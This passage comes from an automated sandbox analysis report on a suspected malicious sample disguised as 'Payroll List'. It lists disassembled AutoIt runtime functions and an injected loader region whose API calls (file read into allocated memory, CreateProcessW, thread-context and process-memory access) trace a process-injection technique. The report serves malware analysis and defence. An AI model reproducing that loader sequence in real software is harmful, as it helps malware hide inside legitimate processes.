                                                                      • Part of subcall function 00123F53: InitCommonControlsEx.COMCTL32(?), ref: 00123FDE
                                                                      • Part of subcall function 00123F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00123FEE
                                                                      • Part of subcall function 00123F53: LoadIconW.USER32(000000A9), ref: 00124004
                                                                      • Part of subcall function 00123F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00124013
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                    • String ID: #$0$AutoIt v3
                                                                    • API String ID: 423443420-4155596026
                                                                    • Opcode ID: d9b0b0af173beb1d2a812e08c92b5cd1be60dfbe98218bcda998d24f78b43384
                                                                    • Instruction ID: 4291779038d4da14c7df9a8bab75969c468cd36106aa3fdf64e5aea496992d00
                                                                    • Opcode Fuzzy Hash: d9b0b0af173beb1d2a812e08c92b5cd1be60dfbe98218bcda998d24f78b43384
                                                                    • Instruction Fuzzy Hash: D5212AB0E00354BBCB04DFE9EC89A9DBBF5FB48314F00412AE215AA6A0D77546C48B91
                                                                    Function 00D57448 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1025 d57448-d574f6 call d54e68 1028 d574fd-d57523 call d58358 CreateFileW 1025->1028 1031 d57525 1028->1031 1032 d5752a-d5753a 1028->1032 1033 d57675-d57679 1031->1033 1039 d57541-d5755b VirtualAlloc 1032->1039 1040 d5753c 1032->1040 1034 d576bb-d576be 1033->1034 1035 d5767b-d5767f 1033->1035 1041 d576c1-d576c8 1034->1041 1037 d57681-d57684 1035->1037 1038 d5768b-d5768f 1035->1038 1037->1038 1044 d57691-d5769b 1038->1044 1045 d5769f-d576a3 1038->1045 1046 d57562-d57579 ReadFile 1039->1046 1047 d5755d 1039->1047 1040->1033 1042 d5771d-d57732 1041->1042 1043 d576ca-d576d5 1041->1043 1050 d57734-d5773f VirtualFree 1042->1050 1051 d57742-d5774a 1042->1051 1048 d576d7 1043->1048 1049 d576d9-d576e5 1043->1049 1044->1045 1052 d576a5-d576af 1045->1052 1053 d576b3 1045->1053 1054 d57580-d575c0 VirtualAlloc 1046->1054 1055 d5757b 1046->1055 1047->1033 1048->1042 1058 d576e7-d576f7 1049->1058 1059 d576f9-d57705 1049->1059 1050->1051 1052->1053 1053->1034 1056 d575c7-d575e2 call d585a8 1054->1056 1057 d575c2 1054->1057 1055->1033 1065 d575ed-d575f7 1056->1065 1057->1033 1061 d5771b 1058->1061 1062 d57707-d57710 1059->1062 1063 d57712-d57718 1059->1063 1061->1041 1062->1061 1063->1061 1066 d575f9-d57628 call d585a8 1065->1066 1067 d5762a-d5763e call d583b8 1065->1067 1066->1065 1073 d57640 1067->1073 1074 d57642-d57646 1067->1074 1073->1033 1075 d57652-d57656 1074->1075 1076 d57648-d5764c CloseHandle 1074->1076 1077 d57666-d5766f 1075->1077 1078 d57658-d57663 VirtualFree 1075->1078 1076->1075 1077->1028 1077->1033 1078->1077
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D57519
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D5773F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 204039940-0
                                                                    • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                    • Instruction ID: 49fedab1cbbf355eaa0d6162df286edce8817579864e06fdcdd6b1656455d740
                                                                    • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                    • Instruction Fuzzy Hash: ECA11574E04209EBDF14CFA4D898BEEBBB5BF48305F208159E905BB280D7759A44CFA4
                                                                    Function 001249FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1134 1249fb-124a25 call 12bcce RegOpenKeyExW 1137 1941cc-1941e3 RegQueryValueExW 1134->1137 1138 124a2b-124a2f 1134->1138 1139 1941e5-194222 call 13f4ea call 1247b7 RegQueryValueExW 1137->1139 1140 194246-19424f RegCloseKey 1137->1140 1145 19423d-194245 call 1247e2 1139->1145 1146 194224-19423b call 126a63 1139->1146 1145->1140 1146->1145
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00124A1D
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001941DB
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0019421A
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00194249
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$CloseOpen
                                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                                    • API String ID: 1586453840-614718249
                                                                    • Opcode ID: b05798f4a1eb89f69082137b8f582d2bb01f539b473bddb5edff73dfa0af8c59
                                                                    • Instruction ID: 17d776b03b68136a0195180c7e22ba3038bd6930b25a849410a1099a4cf08844
                                                                    • Opcode Fuzzy Hash: b05798f4a1eb89f69082137b8f582d2bb01f539b473bddb5edff73dfa0af8c59
                                                                    • Instruction Fuzzy Hash: 1F113D75A00118BFEB04ABA4ED86DEF7BBCEF15744F000069F506D7191EB70AE529750
                                                                    Function 001236B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1161 1236b8-123728 CreateWindowExW * 2 ShowWindow * 2
                                                                    APIs
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001236E6
                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00123707
                                                                    • ShowWindow.USER32(00000000,?,?,?,?,00123AA3,?), ref: 0012371B
                                                                    • ShowWindow.USER32(00000000,?,?,?,?,00123AA3,?), ref: 00123724
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateShow
                                                                    • String ID: AutoIt v3$edit
                                                                    • API String ID: 1584632944-3779509399
                                                                    • Opcode ID: 11e1dd73250d01e3c4e9bf551df3aa832aa13216fb2686024631d0087be6951a
                                                                    • Instruction ID: 7e3341a5a117c603b04be545b561cacdff9901be2f219bfe0e995a7636a3cdfd
                                                                    • Opcode Fuzzy Hash: 11e1dd73250d01e3c4e9bf551df3aa832aa13216fb2686024631d0087be6951a
                                                                    • Instruction Fuzzy Hash: 92F0D0755402D07ADB319BA76C48E6B3E7DD7C7F24B00001AFA05A65A0D67108D5DA70
                                                                    Function 00D57218 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1266 d57218-d57340 call d54e68 call d57108 CreateFileW 1273 d57347-d57357 1266->1273 1274 d57342 1266->1274 1277 d5735e-d57378 VirtualAlloc 1273->1277 1278 d57359 1273->1278 1275 d573f7-d573fc 1274->1275 1279 d5737c-d57393 ReadFile 1277->1279 1280 d5737a 1277->1280 1278->1275 1281 d57395 1279->1281 1282 d57397-d573d1 call d57148 call d56108 1279->1282 1280->1275 1281->1275 1287 d573d3-d573e8 call d57198 1282->1287 1288 d573ed-d573f5 ExitProcess 1282->1288 1287->1288 1288->1275
                                                                    APIs
                                                                      • Part of subcall function 00D57108: Sleep.KERNELBASE(000001F4), ref: 00D57119
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D57336
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileSleep
                                                                    • String ID: AV4EJ1JNFODER
                                                                    • API String ID: 2694422964-3771192685
                                                                    • Opcode ID: 2fb3aa39c0e9be9f02f6b3d9fdea35f98c480207dec4e5da2d47c4d876f6d762
                                                                    • Instruction ID: 8d8a2f5d0c64a9ff85aa482a0cfbf0f496d5457990d99f95eb8299a903baf117
                                                                    • Opcode Fuzzy Hash: 2fb3aa39c0e9be9f02f6b3d9fdea35f98c480207dec4e5da2d47c4d876f6d762
                                                                    • Instruction Fuzzy Hash: 7F518F70D04249EBEF10DBA4D855BEEBB79EF08301F104199EA18BB2C1D7794A48CB75
                                                                    Function 00124139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1290 124139-124160 call 1241a9 1293 193489-193499 call 16c396 1290->1293 1294 124166-124174 call 1241a9 1290->1294 1298 19349e-1934a0 1293->1298 1294->1293 1299 12417a-124180 1294->1299 1300 1934bf-193507 call 13f4ea 1298->1300 1301 1934a2-1934a5 call 124252 1298->1301 1303 1934aa-1934b9 call 166b49 1299->1303 1304 124186-1241a6 call 12c833 1299->1304 1310 193509-193526 call 12496c 1300->1310 1311 193528 1300->1311 1301->1303 1303->1300 1314 19352a-19353d 1310->1314 1311->1314 1316 193543 1314->1316 1317 1936b4-1936b7 call 141c9d 1314->1317 1319 19354a-19354d call 124f30 1316->1319 1320 1936bc-1936c5 call 124252 1317->1320 1323 193552-193574 call 12bbfc call 169cab 1319->1323 1327 1936c7-1936d7 call 124f11 call 13d8f5 1320->1327 1332 193588-193592 call 169c95 1323->1332 1333 193576-193583 1323->1333 1340 1936dc-19370c call 1625b5 call 13f55e call 141c9d call 124252 1327->1340 1342 1935ac-1935b6 call 169c7f 1332->1342 1343 193594-1935a7 1332->1343 1336 19367b-193682 call 12ba85 1333->1336 1341 193687-19368b 1336->1341 1340->1327 1341->1323 1345 193691-1936ae call 124dd9 1341->1345 1352 1935b8-1935c5 1342->1352 1353 1935ca-1935d4 call 13d90c 1342->1353 1343->1336 1345->1317 1345->1319 1352->1336 1353->1336 1358 1935da-1935f2 call 162551 1353->1358 1364 193615-193618 1358->1364 1365 1935f4-193613 call 12ce19 call 12cb37 1358->1365 1367 19361a-193635 call 12ce19 call 13c2a5 call 12cb37 1364->1367 1368 193646-193649 1364->1368 1389 193636-193644 call 12bbfc 1365->1389 1367->1389 1370 193669-19366c call 169c12 1368->1370 1371 19364b-193654 call 162472 1368->1371 1378 193671-19367a call 13f55e 1370->1378 1371->1340 1381 19365a-193664 call 13f55e 1371->1381 1378->1336 1381->1323 1389->1378
                                                                    APIs
                                                                      • Part of subcall function 001241A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001239FE,?,00000001), ref: 001241DB
                                                                    • _free.LIBCMT ref: 001936B7
                                                                    • _free.LIBCMT ref: 001936FE
                                                                      • Part of subcall function 0012C833: __wsplitpath.LIBCMT ref: 0012C93E
                                                                      • Part of subcall function 0012C833: _wcscpy.LIBCMT ref: 0012C953
                                                                      • Part of subcall function 0012C833: _wcscat.LIBCMT ref: 0012C968
                                                                      • Part of subcall function 0012C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0012C978
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                    • API String ID: 805182592-1757145024
                                                                    • Opcode ID: 9152f5a157d5f8110331eceea0c35516051061ddee9dcf438e18141cc6aa9812
                                                                    • Instruction ID: 438429fc3bf50e9dd7f8094f658259acc61bd6e91bd1cad69f435762fadfc177
                                                                    • Opcode Fuzzy Hash: 9152f5a157d5f8110331eceea0c35516051061ddee9dcf438e18141cc6aa9812
                                                                    • Instruction Fuzzy Hash: 88916371910229EFDF04EFA4DC919EDB7B4BF29310F104429F426EB291DB74AA55CB90
                                                                    Function 00124A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00125374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001E1148,?,001261FF,?,00000000,00000001,00000000), ref: 00125392
                                                                      • Part of subcall function 001249FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00124A1D
                                                                    • _wcscat.LIBCMT ref: 00192D80
                                                                    • _wcscat.LIBCMT ref: 00192DB5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat$FileModuleNameOpen
                                                                    • String ID: \$\Include\
                                                                    • API String ID: 3592542968-2640467822
                                                                    • Opcode ID: d2fe69726dd9c010c628fb5556a65ca8d381c04ad0d05d764fdf1d9b5f8d01ec
                                                                    • Instruction ID: c015b6039c454000912180c60336379cb070d96260350206d165ede9ddc05285
                                                                    • Opcode Fuzzy Hash: d2fe69726dd9c010c628fb5556a65ca8d381c04ad0d05d764fdf1d9b5f8d01ec
                                                                    • Instruction Fuzzy Hash: F75160714043809FC714EF95E9E189EB7F8BFA9300B50452EF644976A0EB709B98CB52
                                                                    Function 001434AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __getstream.LIBCMT ref: 001434FE
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 00143539
                                                                    • __wopenfile.LIBCMT ref: 00143549
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                    • String ID: <G
                                                                    • API String ID: 1820251861-2138716496
                                                                    • Opcode ID: 60f3f224103d92cea8b61e228d927b989450adf31dd27f6fdf6dde6bc588cf44
                                                                    • Instruction ID: f1b0c50b40dd49f1a6922880d83022cea7283efc6351421820e1eef42a7ef697
                                                                    • Opcode Fuzzy Hash: 60f3f224103d92cea8b61e228d927b989450adf31dd27f6fdf6dde6bc588cf44
                                                                    • Instruction Fuzzy Hash: 6A11EC70A00206DFDB12BFB49C426AE36E4AF56350B198525F425DB2F1EB34CA1197B1
                                                                    Function 0013D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0013D28B,SwapMouseButtons,00000004,?), ref: 0013D2BC
                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0013D28B,SwapMouseButtons,00000004,?,?,?,?,0013C865), ref: 0013D2DD
                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,0013D28B,SwapMouseButtons,00000004,?,?,?,?,0013C865), ref: 0013D2FF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Control Panel\Mouse
                                                                    • API String ID: 3677997916-824357125
                                                                    • Opcode ID: cf935f22fe667565d352d3b105db74632c090046b58794f37e10e0ee613b54e7
                                                                    • Instruction ID: d4a45e7e9a19b76da98537c7f0166516649d332d8f1a6df853eeadef4d8ea486
                                                                    • Opcode Fuzzy Hash: cf935f22fe667565d352d3b105db74632c090046b58794f37e10e0ee613b54e7
                                                                    • Instruction Fuzzy Hash: AF1135B5611208BFDB209FA8EC84EAF7BBCEF45744F104869F906D7210E731AE459B60
                                                                    Function 00D56108 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00D568C3
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D56959
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D5697B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                    • Instruction ID: 13e8772bc8fab4ffd0502447729693decdac3617b06f4fb5695789b4aa959fac
                                                                    • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                    • Instruction Fuzzy Hash: 9A621D30A14218DBEB24CFA4C841BEEB772EF58301F5091A9D50DEB390E7759E85CB69
                                                                    Function 00122322 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 001222A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,001224F1), ref: 00122303
                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001225A1
                                                                    • CoInitialize.OLE32(00000000), ref: 00122618
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0019503A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                    • String ID: P
                                                                    • API String ID: 3815369404-3564208636
                                                                    • Opcode ID: 6fe3a303068ea69396fe3c4bfedd9c356f47f994a8e82e12de4367d8b9fa342e
                                                                    • Instruction ID: c7d71472d9a0bd3cacf71cab06590e71263c62574538ee0d78c8e60a80016849
                                                                    • Opcode Fuzzy Hash: 6fe3a303068ea69396fe3c4bfedd9c356f47f994a8e82e12de4367d8b9fa342e
                                                                    • Instruction Fuzzy Hash: 94718DB49012C2ABC704EFAAADD049DBBA4BB693547A0456EE209DFBB1CB3044D0CF15
                                                                    Function 0016C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00124517: _fseek.LIBCMT ref: 0012452F
                                                                      • Part of subcall function 0016C56D: _wcscmp.LIBCMT ref: 0016C65D
                                                                      • Part of subcall function 0016C56D: _wcscmp.LIBCMT ref: 0016C670
                                                                    • _free.LIBCMT ref: 0016C4DD
                                                                    • _free.LIBCMT ref: 0016C4E4
                                                                    • _free.LIBCMT ref: 0016C54F
                                                                      • Part of subcall function 00141C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00147A85), ref: 00141CB1
                                                                      • Part of subcall function 00141C9D: GetLastError.KERNEL32(00000000,?,00147A85), ref: 00141CC3
                                                                    • _free.LIBCMT ref: 0016C557
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                    • String ID:
                                                                    • API String ID: 1552873950-0
                                                                    • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                    • Instruction ID: 71fe7d5a96c2334a05f718a049e7f017131a56df5ce403d75a45bfe0aa37411d
                                                                    • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                    • Instruction Fuzzy Hash: 425161B1A04218AFDF249F64DC81BADBBB9EF58304F10009EF259E3251DB715A90CF58
                                                                    Function 0013EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0013EBB2
                                                                      • Part of subcall function 001251AF: _memset.LIBCMT ref: 0012522F
                                                                      • Part of subcall function 001251AF: _wcscpy.LIBCMT ref: 00125283
                                                                      • Part of subcall function 001251AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00125293
                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 0013EC07
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0013EC16
                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00193C88
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1378193009-0
